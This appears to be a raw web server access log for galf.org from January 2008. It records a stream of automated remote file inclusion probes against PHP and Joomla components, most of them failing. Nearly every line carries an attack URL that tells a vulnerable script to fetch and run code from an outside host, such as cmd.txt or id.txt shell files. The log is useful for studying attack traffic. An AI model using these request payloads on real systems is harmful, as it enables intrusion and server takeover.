210.96.22.186 - - [20/Jan/2008:17:06:23 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.32.128.178 - - [20/Jan/2008:17:06:50 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.32.128.178 - - [20/Jan/2008:17:06:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.63.172.153 - - [20/Jan/2008:17:06:59 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.98.25.34 - - [20/Jan/2008:17:07:12 -0800] "GET /logs/access_071008.log/index2.php?x=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.34 - - [20/Jan/2008:17:07:12 -0800] "GET /index2.php?x=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.34 - - [20/Jan/2008:17:07:12 -0800] "GET /logs/index2.php?x=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:07:33 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.232.68.10 - - [20/Jan/2008:17:07:44 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.79.190.28 - - [20/Jan/2008:17:08:26 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.79.190.28 - - [20/Jan/2008:17:08:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.79.190.28 - - [20/Jan/2008:17:08:26 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.203.9.46 - - [20/Jan/2008:17:09:17 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://danieledm.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.203.9.46 - - [20/Jan/2008:17:09:17 -0800] "GET /modules/My_eGallery/index.php?basepath=http://danieledm.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:10:05 -0800] "GET /logs/access_070702.log/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:10:05 -0800] "GET /get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:10:06 -0800] "GET /logs/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:10:40 -0800] "GET //login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:17:11:45 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.32.128.178 - - [20/Jan/2008:17:12:42 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.218.217.16 - - [20/Jan/2008:17:12:51 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.218.217.16 - - [20/Jan/2008:17:12:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.38.129.76 - - [20/Jan/2008:17:14:24 -0800] "GET /logs/access_071014.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:16:03 -0800] "GET //login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:18:08 -0800] "GET /logs/access_071203.log/index.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:18:08 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:18:09 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.247.116 - - [20/Jan/2008:17:19:23 -0800] "GET /logs/default.php?arquivo=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:35 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:35 -0800] "GET /?M=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:35 -0800] "GET /?M=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:35 -0800] "GET /?S=http%3A%2F%2Fwww.syntasoft.com%2Fforum%2FThemes%2Frowizah%2Fnisahuc%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:35 -0800] "GET /?S=http%3A%2F%2Fwww.cultcov.ro%2Fhuc%2Fugec%2Fhamiyu%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:36 -0800] "GET /?D=http%3A%2F%2Fwww.tcmforum.com%2Fweb%2Fopu%2Fmujag%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:36 -0800] "GET /?D=http%3A%2F%2Fwww.asigurareamea.ro%2Fupload_fisiere%2Fagihixu%2Fbezodan%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:36 -0800] "GET /?N=http%3A%2F%2Fwww.cultcov.ro%2Fhuc%2Fugec%2Fhamiyu%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:36 -0800] "GET /?N=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:36 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:36 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:37 -0800] "GET /logs/ HTTP/1.1" 200 5619 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:37 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:37 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:37 -0800] "GET /?M=D HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:37 -0800] "GET /?S=D HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:38 -0800] "GET /logs/access_070723.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
206.51.231.32 - - [20/Jan/2008:17:19:38 -0800] "GET /?D=D HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "galf.org"
200.222.110.249 - - [20/Jan/2008:17:20:47 -0800] "GET /default.php?page=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:21:33 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:21:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:17:22:04 -0800] "GET /logs/access_071203.log//index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:17:22:05 -0800] "GET //index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [20/Jan/2008:17:22:05 -0800] "GET /logs//index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.38.129.76 - - [20/Jan/2008:17:22:13 -0800] "GET /logs/access_071112.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.40.194.211 - - [20/Jan/2008:17:23:15 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://urbanmos.com/events/log/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.40.194.211 - - [20/Jan/2008:17:23:16 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://urbanmos.com/events/log/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:17:24:17 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:17:24:17 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
121.173.130.137 - - [20/Jan/2008:17:24:53 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.173.130.137 - - [20/Jan/2008:17:24:53 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.173.130.137 - - [20/Jan/2008:17:25:10 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:17:28:45 -0800] "GET /logs/access_071014.log/get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.89.224.76 - - [20/Jan/2008:17:31:04 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 1267267 "-" "Wget/1.10.2" "galf.org"
217.113.226.82 - - [20/Jan/2008:17:31:18 -0800] "GET /logs/access_070806.log//index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:17:31:38 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:17:33:32 -0800] "GET /logs/admin/doeditconfig.php?thispath=../includes&config[path]=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:17:33:32 -0800] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
83.19.144.26 - - [20/Jan/2008:17:33:52 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [20/Jan/2008:17:33:53 -0800] "GET //skin/zero_vote/error.php?dir=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [20/Jan/2008:17:33:53 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:17:35:03 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:35:19 -0800] "GET /logs/access_071210.log/default.php?page=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:35:19 -0800] "GET /default.php?page=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:35:20 -0800] "GET /logs/default.php?page=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.218.217.16 - - [20/Jan/2008:17:35:35 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:36:29 -0800] "GET /logs/access_071217.log/default.php?page=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:37:15 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:37:15 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:39:23 -0800] "GET /logs/access_071014.log//login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:39:24 -0800] "GET /logs//login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.127.2.93 - - [20/Jan/2008:17:41:27 -0800] "GET /index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.83.77 - - [20/Jan/2008:17:44:57 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.83.77 - - [20/Jan/2008:17:44:58 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:17:45:37 -0800] "GET /logs/access_070820.log/index.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:17:46:52 -0800] "GET /logs/access_071008.log/index.php?get=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:17:46:53 -0800] "GET /index.php?get=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:17:46:53 -0800] "GET /logs/index.php?get=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:17:47:33 -0800] "GET /logs/access_070827.log//config.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.201.254.239 - - [20/Jan/2008:17:47:33 -0800] "GET /logs//config.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.194.74.238 - - [20/Jan/2008:17:52:21 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
82.194.74.238 - - [20/Jan/2008:17:52:21 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:52:46 -0800] "GET /logs/access_071014.log//login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:52:46 -0800] "GET /logs//login.php?dir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.52.142.29 - - [20/Jan/2008:17:54:13 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
72.52.142.29 - - [20/Jan/2008:17:54:13 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:56:49 -0800] "GET /logs/index2.php?x=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:56:49 -0800] "GET /index2.php?x=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:56:57 -0800] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:57:34 -0800] "GET /logs/index2.php?x=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:57:35 -0800] "GET /index2.php?x=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:17:58:08 -0800] "GET /logs/access_071210.log/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:17:58:08 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:17:58:08 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:58:26 -0800] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:58:26 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:17:58:26 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:17:58:48 -0800] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:17:58:55 -0800] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:17:59:19 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.52.196.204 - - [20/Jan/2008:17:59:35 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/fuckz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
72.52.196.204 - - [20/Jan/2008:17:59:35 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/fuckz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
80.38.129.76 - - [20/Jan/2008:18:00:34 -0800] "GET /logs/access_070820.log/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.38.129.76 - - [20/Jan/2008:18:00:34 -0800] "GET /?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.76" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:04:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.98.160.84 - - [20/Jan/2008:18:04:31 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
66.98.160.84 - - [20/Jan/2008:18:04:31 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:18:04:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:18:07:14 -0800] "GET /logs/access_071210.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:18:07:14 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
